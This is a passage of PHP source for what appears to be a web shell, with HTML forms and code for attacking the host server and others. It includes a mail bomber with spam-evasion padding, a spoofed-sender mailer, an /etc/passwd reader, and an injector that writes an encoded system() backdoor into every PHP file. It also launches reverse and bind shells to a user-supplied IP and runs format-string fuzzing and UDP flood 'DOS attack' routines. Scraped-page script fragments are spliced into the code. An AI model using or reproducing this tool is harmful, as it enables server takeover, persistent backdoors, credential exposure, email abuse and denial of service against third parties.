4244 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4245 /* ]]> */
4246 ';"/>
4247                     </td>
4248                     </tr>
4249                     
4250                     <tr>
4251                     <td style="width:30%;">
4252                     Subject
4253                     </td>
4254                     <td>
4255                     <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
4256                     </td>
4257                     </tr>
4258                     <tr>
4259                     <td style="width:30%;">
4260                     No. of Times
4261                     </td>
4262                     <td>
4263                     <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
4264                     </td>
4265                     </tr>
4266                     
4267                     <tr>
4268                     <td style="width:30%;">
4269                     
4270                     Pad your message (Less spam detection)
4271                     
4272                     </td>
4273                     <td>
4274                     
4275                     <input type="checkbox" name="padding"/>
4276                     
4277                     </td>
4278                     </tr>
4279                     <tr>
4280                     <td colspan="2">
4281                     <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea>
4282                     </td>
4283                     </tr>
4284                     
4285                     
4286                     <tr>
4287                     <td rowspan="2">
4288                     <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="    Bomb!  "/>
4289                     </td>
4290                     </tr>
4291                     </table>
4292                     </form>
4293                     <?php
4294                     }
4295                     }
4296                     //Mass Mailer
4297                     
4298                     else if(isset($_GET['mail']))
4299                     {
4300                     if
4301                     (isset($_GET['to']) &&  isset($_GET['from']) &&  isset($_GET['subject']) && isset($_GET['message']))
4302                     {
4303                     if(mail($_GET['to'],$_GET['subject'],$_GET['message'],"From:".$_GET['from']))
4304                     {
4305                     echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
4306                     }
4307                     else
4308                     {
4309                     echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
4310                     }
4311                     }
4312                     else
4313                     {
4314                     ?>
4315                     <div align="left">
4316                     <form method="GET">
4317                     <input type="hidden" name="mail" />
4318                     <input type="hidden" name="mailbomb" />
4319                     <table align="left" style="width:100%;">
4320                     <tr>
4321                     <td style="width:10%;">From</td>
4322                     <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in
4323 /* <![CDATA[ */
4324 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4325 /* ]]> */
4326 " onFocus="if(this.value == 'president@whitehouse.gov
4327 /* <![CDATA[ */
4328 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4329 /* ]]> */
4330 ')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov
4331 /* <![CDATA[ */
4332 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4333 /* ]]> */
4334 ';"/></td>
4335                     </tr>
4336                     
4337                     <tr>
4338                     <td style="width:20%;">To</td>
4339                     <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com
4340 /* <![CDATA[ */
4341 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4342 /* ]]> */
4343 ,victim2@domain.com
4344 /* <![CDATA[ */
4345 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4346 /* ]]> */
4347 " onFocus="if(this.value == 'victim@domain.com
4348 /* <![CDATA[ */
4349 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4350 /* ]]> */
4351 ,victim2@domain.com
4352 /* <![CDATA[ */
4353 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4354 /* ]]> */
4355 ')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com
4356 /* <![CDATA[ */
4357 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4358 /* ]]> */
4359 ,victim2@domain.com
4360 /* <![CDATA[ */
4361 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4362 /* ]]> */
4363 ';"/></td>
4364                     </tr>
4365                     
4366                     <tr>
4367                     <td style="width:20%;">Subject</td>
4368                     <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
4369                     </tr>
4370                     
4371                     
4372                     <tr>
4373                     <td colspan="2">
4374                         <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!!</textarea>
4375                     </td>
4376                     </tr>
4377                     
4378                     
4379                     <tr>
4380                     <td rowspan="2">
4381                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="   Send! "/>
4382                     </td>
4383                     </tr>
4384                     </table>
4385                     </form></div>
4386                     <?php
4387                     }
4388                     }
4389                     }
4390                     
4391                     // View Passwd file
4392                     
4393                     else if(isset($_GET['passwd']))
4394                     {
4395                     $test='';
4396                     $tempp= tempnam($test, "cx");
4397                     $get = "/etc/passwd";
4398                     if(copy("compress.zlib://".$get, $tempp))
4399                     {
4400                     $fopenzo = fopen($tempp, "r");
4401                     $freadz = fread($fopenzo, filesize($tempp));
4402                     fclose($fopenzo);
4403                     $source = htmlspecialchars($freadz);
4404                     echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
4405                     unlink($tempp);
4406                     }
4407                     else
4408                     {
4409                     if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
4410                     {
4411                     $temp = "";
4412                     for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
4413                     {
4414                     $uid = @posix_getpwuid($_GET['val1']);
4415                     if ($uid)
4416                     $temp .= join(':',$uid)."
4417                     ";
4418                     }
4419                     echo '<br/>';
4420                     paramexe('Users', $temp);
4421                     }
4422                     else
4423                     {
4424                     ?>
4425                     <form>
4426                     <input type="hidden" name="passwd">
4427                     <table border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
4428                     <tr>
4429                     <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
4430                     </tr>
4431                     <tr>
4432                     <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
4433                     </tr>
4434                     <tr>
4435                     <td colspan="2" align="center"><input type="submit" value="  Go  " class="but"></td>
4436                     </tr>
4437                     </table><br>
4438                     </form>
4439                     <?php
4440                     }
4441                     }
4442                     }
4443                     
4444                     
4445                     // Code Injector
4446                     
4447                     else if(isset($_GET['injector']))
4448                     {
4449                     ?>
4450                     <table id="margins" >
4451                     <tr>
4452                     <form method='POST'>
4453                     <input type="hidden" name="injector"/>
4454                     <tr>
4455                     <td width="100" class="title">
4456                         Directory
4457                     </td>
4458                     <td>
4459                          <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
4460                     </td>
4461                     </tr>
4462                     <tr>
4463                     <td class="title">
4464                     Mode
4465                     </td>
4466                     <td>
4467                         <select style="width: 400px;" name="mode" class="box">
4468                             <option value="Apender">Apender</option>
4469                             <option value="Overwriter">Overwriter</option>
4470                         </select>
4471                     </td>
4472                     </tr>
4473                     <tr>
4474                     <td class="title">
4475                         File Type
4476                     </td>
4477                     <td>
4478                         <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
4479                     </td>
4480                     </tr>
4481                     <tr>
4482                     <td>Create A backdoor by injecting this code in every php file of current directory</td>
4483                     </tr>
4484                     
4485                     <tr>
4486                     <td colspan="2">
4487                         <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
4488                     </td>
4489                     </tr>
4490                     
4491                     
4492                     <tr>
4493                     <td rowspan="2">
4494                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
4495                     </td>
4496                     </tr>
4497                     </form>
4498                     </table>
4499                     <?php
4500                     }
4501                     // Connect
4502                     
4503                     else if(isset($_GET['connect']))
4504                     {
4505                     ?>
4506                     <table style="width:50%" align="center" >
4507                     <tr>
4508                     <th colspan="1" width="50px">Reverse Shell</th>
4509                     <th colspan="1" width="50px">Bind Shell</th>
4510                     </tr>
4511                     <tr>
4512                     <form action='<?php echo $self; ?>?connect' method='post' >
4513                     <td>
4514                     <table style="border-spacing: 6px;">
4515                     <tr>
4516                     <td>IP </td>
4517                     <td>
4518                         <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
4519                     </td>
4520                     </tr>
4521                     <tr>
4522                     <td>Port </td>
4523                     <td><input style="width: 200px;" class="box" name="port" size='5' value="21"/></td>
4524                     
4525                     </tr>
4526                     <tr>
4527                     <td style="vertical-align:top;">Use:</td>
4528                     <td><select style="width: 95px;" name="lang" class="sbox">
4529                     <option value="perl">Perl</option>
4530                     <option value="python">Python</option>
4531                     <option value="php">PHP</option>
4532                     </select>&nbsp;&nbsp;
4533                     <input style="width: 90px;" class="but" type="submit" value="Connect!"/></td>
4534                     
4535                     </tr>
4536                     </table>
4537                     </td>
4538                     </form>
4539                     <form action='<?php echo $self; ?>?connect' method='post' >
4540                     <td style="vertical-align:top;">
4541                     <table style="border-spacing: 6px;">
4542                     <tr>
4543                     <td>Port</td>
4544                     <td>
4545                         <input style="width: 200px;" class="box" name="port" value="21" />
4546                     </td>
4547                     </tr>
4548                     <tr>
4549                     <td>Password </td>
4550                     <td>
4551                     <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
4552                     </td>
4553                     <tr>
4554                     <td>Using</td>
4555                     <td>
4556                     <select style="width: 95px;" name="lang" id="lang" class="sbox">
4557                     <option value="perl">Perl</option>
4558                     <option value="c">C</option>
4559                     </select>&nbsp;&nbsp;
4560                     <input style="width: 90px;" class="but" type="submit" value=" Bind "/></td>
4561                     </tr>
4562                     </table>
4563                     </td>
4564                     </form>
4565                     </tr>
4566                     </table>
4567                     <div align="center">Click "Connect" only after open port for it. You should use NetCat, run "nc -l -n -v -p 21"!</div>
4568                     <p align="center">Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
4569                     <?php
4570                     if(isset($_POST['ip']) &&   isset($_POST['port']) &&  $_POST['ip'] != "" && $_POST['port'] != ""  )
4571                     {
4572                     
4573                     $host = $_POST['ip'];
4574                     $port = $_POST['port'];
4575                     if($_POST["lang"] == "perl")
4576                     {
4577                     if(is_writable("."))
4578                     {
4579                     @$fh=fopen(getcwd()."/bc.pl",'w');
4580                     @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
4581                     @fclose($fh);
4582                     echo "<font class=txt size=3>Trying to connect...</font></br>";
4583                     execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
4584                     if(!@unlink(getcwd()."/bc.pl")) echo "<font size=3>Warning: Failed to delete reverse-connection program</font></br>";
4585                     }
4586                     else
4587                     {
4588                     @$fh=fopen("/tmp/bc.pl","w");
4589                     @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
4590                     @fclose($fh);
4591                     echo "<font class=txt size=3>Trying to connect...</font></br>";
4592                     execmd("perl /tmp/bc.pl $host $port &",$disable);
4593                     if(!@unlink("/tmp/bc.pl")) echo "<font><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>";
4594                     }
4595                     }
4596                     else if($_POST["lang"] == "python")
4597                     {
4598                     if(is_writable("."))
4599                     {
4600                     $w_file=@fopen(getcwd()."/bc.py","w");
4601                     if($w_file)
4602                     {
4603                     @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
4604                     @fclose($w_file);
4605                     }
4606                     chmod('bc.py', 0777);
4607                     $blah = execmd("python ".getcwd()."/bc.py $host $port &");
4608                     echo "<font class=txt size=2>Trying to connect...</font></br>";
4609                     if(!@unlink("bc.py")) echo "<font><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>";
4610                     }
4611                     else
4612                     {
4613                     $w_file=@fopen("/tmp/bc.py","w") or err();
4614                     if($w_file)
4615                     {
4616                     @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
4617                     @fclose($w_file);
4618                     }
4619                     chmod('/tmp/bc.py', 0777);
4620                     $blah = execmd("python /tmp/bc.py 127.0.0.1 21 &");
4621                     echo "<font class=txt size=2>Trying to connect...</font></br>";
4622                     if(!@unlink("/tmp/bc.py")) echo "<font><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>";
4623                     }
4624                     }
4625                     else if($_POST["lang"] == "php")
4626                     {
4627                     echo "<font class=txt size=3>Attempting to connect...</font>";
4628                     $ip = $_POST['ip'];
4629                     $port=$_POST['port'];
4630                     $sockfd=fsockopen($ip , $port , $errno, $errstr );
4631                     if($errno != 0)
4632                     {
4633                     echo "<font class=txt><b>$errno</b> : $errstr</font>";
4634                     }
4635                     else if (!$sockfd)
4636                     {
4637                     $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
4638                     }
4639                     else
4640                     {
4641                     fputs ($sockfd ,"
4642                     =================================================================
4643                     Coded By Arjun
4644                     =================================================================");
4645                     $pwd = exec_all("pwd");
4646                     $sysinfo = exec_all("uname -a");
4647                     $id = exec_all("id");
4648                     $len = 1337;
4649                     fputs($sockfd ,$sysinfo . "
4650                     " );
4651                     fputs($sockfd ,$pwd . "
4652                     " );
4653                     fputs($sockfd ,$id ."
4654                     
4655                     " );
4656                     fputs($sockfd ,$dateAndTime."
4657                     
4658                     " );
4659                     while(!feof($sockfd))
4660                     {
4661                     $cmdPrompt ="(dhanush)[$]> ";
4662                     fputs ($sockfd , $cmdPrompt );
4663                     $command= fgets($sockfd, $len);
4664                     fputs($sockfd , "
4665                     " . exec_all($command) . "
4666                     
4667                     ");
4668                     }
4669                     fclose($sockfd);
4670                     }
4671                     }
4672                     }
4673                     else if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
4674                     {
4675                     $passwd = $_POST['passwd'];
4676                     if($_POST['lang'] == 'c')
4677                     {
4678                     if(is_writable("."))
4679                     {
4680                     @$fh=fopen(getcwd()."/bp.c",'w');
4681                     @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
4682                     @fclose($fh);
4683                     execmd("chmod ".getcwd()."/bp.c 0755");
4684                     execmd("gcc -o ".getcwd()."/bp ".getcwd()."/bp.c");
4685                     execmd("chmod ".getcwd()."/bp 0755");
4686                     $out = execmd(getcwd()."/bp"." ".$_POST['port']." ". $passwd ." &");
4687                     echo "<pre>$out
4688                     ".execmd("ps aux | grep bp.pl")."</pre>";
4689                     }
4690                     else
4691                     {
4692                     @$fh=fopen("/tmp/bp.c","w");
4693                     @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
4694                     @fclose($fh);
4695                     execmd("chmod /tmp/bp.c 0755");
4696                     execmd("gcc -o /tmp/bp /tmp/bp.c");
4697                     $out = execmd("/tmp/bp"." ".$_POST['port']." ". $passwd ." &");
4698                     echo "<pre>$out
4699                     ".execmd("ps aux | grep bp")."</pre>";
4700                     }
4701                     }
4702                     if($_POST['lang'] == 'perl')
4703                     {
4704                     if(is_writable("."))
4705                     {
4706                     @$fh=fopen(getcwd()."/bp.pl",'w');
4707                     @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
4708                     @fclose($fh);
4709                     execmd("chmod ".getcwd()."/bp.pl 0755");
4710                     $out = execmd("perl ".getcwd()."/bp.pl" . " " . $passwd ." &");
4711                     echo "<pre>$out
4712                     ".execmd("ps aux | grep bp.pl")."</pre>";
4713                     }
4714                     else
4715                     {
4716                     @$fh=fopen("/tmp/bp.pl","w");
4717                     @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
4718                     @fclose($fh);
4719                     $out = execmd("perl /tmp/bp.pl ". $passwd ." &");
4720                     echo "<pre>$out
4721                     ".execmd("ps aux | grep bp.pl")."</pre>";
4722                     }
4723                     }
4724                     }
4725                     }
4726                     
4727                     //fuzzer
4728                     
4729                     else if(isset($_GET['fuzz']))
4730                     {
4731                     if(isset($_GET['ip']) &&
4732                     isset($_GET['port']) &&
4733                     isset($_GET['times']) &&
4734                     isset($_GET['time']) &&
4735                     isset($_GET['message']) &&
4736                     isset($_GET['messageMultiplier']) &&
4737                     $_GET['message'] != "" &&
4738                     $_GET['time'] != "" &&
4739                     $_GET['times'] != "" &&
4740                     $_GET['port'] != "" &&
4741                     $_GET['ip'] != "" &&
4742                     $_GET['messageMultiplier'] != ""
4743                     )
4744                     {
4745                     $IP=$_GET['ip'];
4746                     $port=$_GET['port'];
4747                     $times = $_GET['times'];
4748                     $timeout = $_GET['time'];
4749                     $send = 0;
4750                     $ending = "";
4751                     $multiplier = $_GET['messageMultiplier'];
4752                     $data = "";
4753                     $mode="tcp";
4754                     $data .= "GET /";
4755                     $ending .= " HTTP/1.1
4756                     
4757                     
4758                     
4759                     ";
4760                     if($_GET['type'] == "tcp")
4761                     {
4762                     $mode = "tcp";
4763                     }
4764                     while($multiplier--)
4765                     {
4766                     $data .= urlencode($_GET['message']);
4767                     }
4768                     $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
4769                     $data .= "by-Dhanush".$ending;
4770                     $length = strlen($data);
4771                     
4772                     
4773                     echo "Sending Data :- <br /> <p align='center'>$data</p>";
4774                     
4775                     print "I am at ma Work now <img src="/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> ;D! Dont close this window untill you recieve a message <br>";
4776                     for($i=0;$i<$times;$i++)
4777                     {
4778                     $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
4779                     if($socket)
4780                     {
4781                     fwrite($socket , $data , $length );
4782                     fclose($socket);
4783                     }
4784                     }
4785                     echo "<script>alert('Fuzzing Completed!');</script>";
4786                     echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
4787                     echo "Total Number of Packets Sent : " . $times . "<br />";
4788                     echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
4789                     echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
4790                     }
4791                     else
4792                     {
4793                     ?>
4794                     <form method="GET">
4795                     <input type="hidden" name="fuzz" />
4796                     <table id="margins">
4797                     <tr>
4798                     <td width="400" class="title">
4799                         IP
4800                     </td>
4801                     <td>
4802                         <input class="box" name="ip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
4803                     </td>
4804                     </tr>
4805                     
4806                     <tr>
4807                     <td class="title">
4808                         Port
4809                     </td>
4810                     <td>
4811                         <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
4812                     </td>
4813                     </tr>
4814                     
4815                     <tr>
4816                     <td class="title">
4817                         Timeout
4818                     </td>
4819                     <td>
4820                         <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
4821                     </td>
4822                     </tr>
4823                     
4824                     
4825                     <tr>
4826                     <td class="title">
4827                         No of times
4828                     </td>
4829                     <td>
4830                         <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
4831                     </td>
4832                     </tr>
4833                     
4834                     <tr>
4835                     <td class="title">
4836                         Message (The message Should be long and it will be multiplied with the value after it)
4837                     </td>
4838                     <td>
4839                         <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
4840                     </td>
4841                     <td>
4842                         x
4843                     </td>
4844                     <td width="20">
4845                         <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
4846                     </td>
4847                     </tr>
4848                     
4849                     <tr>
4850                     <td rowspan="2">
4851                         <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="but" value="  Submit  "/>
4852                     </td>
4853                     </tr>
4854                     </table>
4855                     </form>
4856                     <?php
4857                     }
4858                     }
4859                     
4860                     
4861                     //DDos
4862                     
4863                     else if(isset($_GET['dos']))
4864                     {
4865                     if(isset($_GET['ip']) &&  isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
4866                     $_GET['port'] != "" && $_GET['ip'] != "" &&    $_GET['timeout'] != "" && $_GET['exTime'] != ""    )
4867                     {
4868                     $IP=$_GET['ip'];
4869                     $port=$_GET['port'];
4870                     $executionTime = $_GET['exTime'];
4871                     $noOfBytes = $_GET['noOfBytes'];
4872                     $data = "";
4873                     $timeout = $_GET['timeout'];
4874                     $packets = 0;
4875                     $counter = $noOfBytes;
4876                     $maxTime = time() + $executionTime;;
4877                     while($counter--)
4878                     {
4879                     $data .= "X";
4880                     }
4881                     $data .= " Dhanush";
4882                     print "I am at ma Work now <img src="/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> ;D! Dont close this window untill you recieve a message <br>";
4883                     
4884                     while(1)
4885                     {
4886                     $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
4887                     if($socket)
4888                     {
4889                     fwrite($socket , $data);
4890                     fclose($socket);
4891                     $packets++;
4892                     }
4893                     if(time() >= $maxTime)
4894                     {
4895                     break;
4896                     }
4897                     }
4898                     echo "<script>alert('Dos Completed!');</script>";
4899                     echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
4900                     echo "Total Number of Packets Sent : " . $packets . "<br />";
4901                     echo "Total Data Sent = ". HumanReadableFilesize($packets*$noOfBytes) . "<br />";
4902                     echo "Data per packet = " . HumanReadableFilesize($noOfBytes) . "<br />";
4903                     }
4904                     else
4905                     {
4906                     ?>
4907                     <form method="GET">
4908                     <input type="hidden" name="dos" />
4909                     <table id="margins">
4910                     <tr>
4911                     <td width="400" class="title">
4912                     IP
4913                     </td>
4914                     <td>
4915                     <input class="box" name="ip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
4916                     </td>
4917                     </tr>
4918                     
4919                     <tr>
4920                     <td class="title">
4921                     Port
4922                     </td>
4923                     <td>
4924                     <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
4925                     </td>
4926                     </tr>
4927                     
4928                     <tr>
4929                     <td class="title">
4930                     Timeout (Time in seconds)
4931                     </td>
4932                     <td>
4933                     <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
4934                     </td>
4935                     </tr>
4936                     
4937                     
4938                     <tr>
4939                     <td class="title">
4940                     Execution Time (Time in seconds)
4941                     </td>
4942                     <td>
4943                     <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
4944                     </td>
4945                     </tr>
4946                     
4947                     <tr>
4948                     <td class="title">
4949                     No of Bytes per/packet
4950                     </td>
4951                     <td>
4952                     <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
4953                     </td>
4954                     </tr>
4955                     
4956                     
4957                     <tr>
4958                     <td rowspan="2">
4959                     <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="but" value="   Attack >> "/>
4960                     </td>
4961                     </tr>
4962                     </table>
4963                     </form>
4964                     <?php
4965                     }
4966                     }
4967                     
4968                     // Sec info
4969                     else if(isset($_GET['secinfo']))
4970                     { ?>
4971                     <br><br><center><font size=5>Server security information</font><br><br></center>
4972                     <table style="width:100%;" border="1" class="pwdtbl">
4973                     <tr>
4974                     <td style="width:7%;">Curl</td>
4975                     <td style="width:7%;">Oracle</td>
4976                     <td style="width:7%;">MySQL</td>
4977                     <td style="width:7%;">MSSQL</td>
4978                     <td style="width:7%;">PostgreSQL</td>
4979                     <td style="width:12%;">Open Base Directory</td>
4980                     <td style="width:10%;">Safe_Exec_Dir</td>
4981                     <td style="width:7%;">PHP Version</td>
4982                     <td style="width:7%;">Server Admin</td>
4983                     </tr>
4984                     <tr>
4985                     <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
4986                     <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
4987                     <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
4988                     <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
4989                     <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
4990                     <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
4991                     <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "NONE</b>";}else {echo "<font class=txt>$df</font></b>";};} ?></font></td>
4992                     <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
4993                     <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
4994                     </tr>
4995                     </table><br> <?php
4996                     mysecinfo();
4997                     }
4998                     
4999                     else if(isset($_GET["com"]))
5000                     {
5001                     echo "<br>";
5002                     ob_start();
5003                     eval("phpinfo();");
5004                     $b = ob_get_contents();
5005                     ob_end_clean();
5006                     $a = strpos($b,"<body>")+6;
5007                     $z = strpos($b,"</body>");
5008                     $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
5009                     echo $s_result;
5010                     }
5011                     
5012                     else if(isset($_GET['perms']))
5013                     {
5014                     ?>
5015                     <form method="POST" action="<?php echo $self; ?>" >
5016                     <input type="hidden" name="myfilename" value="<?php echo $_GET['file']; ?>">
5017                     <table align="center" border="1" style="width:40%;">
5018                     <tr>
5019                     <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
5020                     </tr>
5021                     <tr>
5022                     <td colspan="2" align="center" style="height:60px">
5023                     <input type="Submit" value="Change Permission" class="but" style="padding: 5px;" name="changeperms"/></td>
5024                     </tr>
5025                     </table>
5026                     
5027                     </form>
5028                     <?php
5029                     }
5030                     
5031                     else if(isset($_GET['rename']))
5032                     {
5033                     ?>
5034                     <form method="GET" action="<?php echo $self; ?>" >
5035                     <input type="hidden" name="getdir" value="<?php echo $_GET['getdir']; ?>">
5036                     <table>
5037                     <tr>
5038                     <td>File </td><td> : </td><td><input value="<?php echo $_GET['rename'];?>" name="file" class="box" /></td>
5039                     </tr>
5040                     <tr>
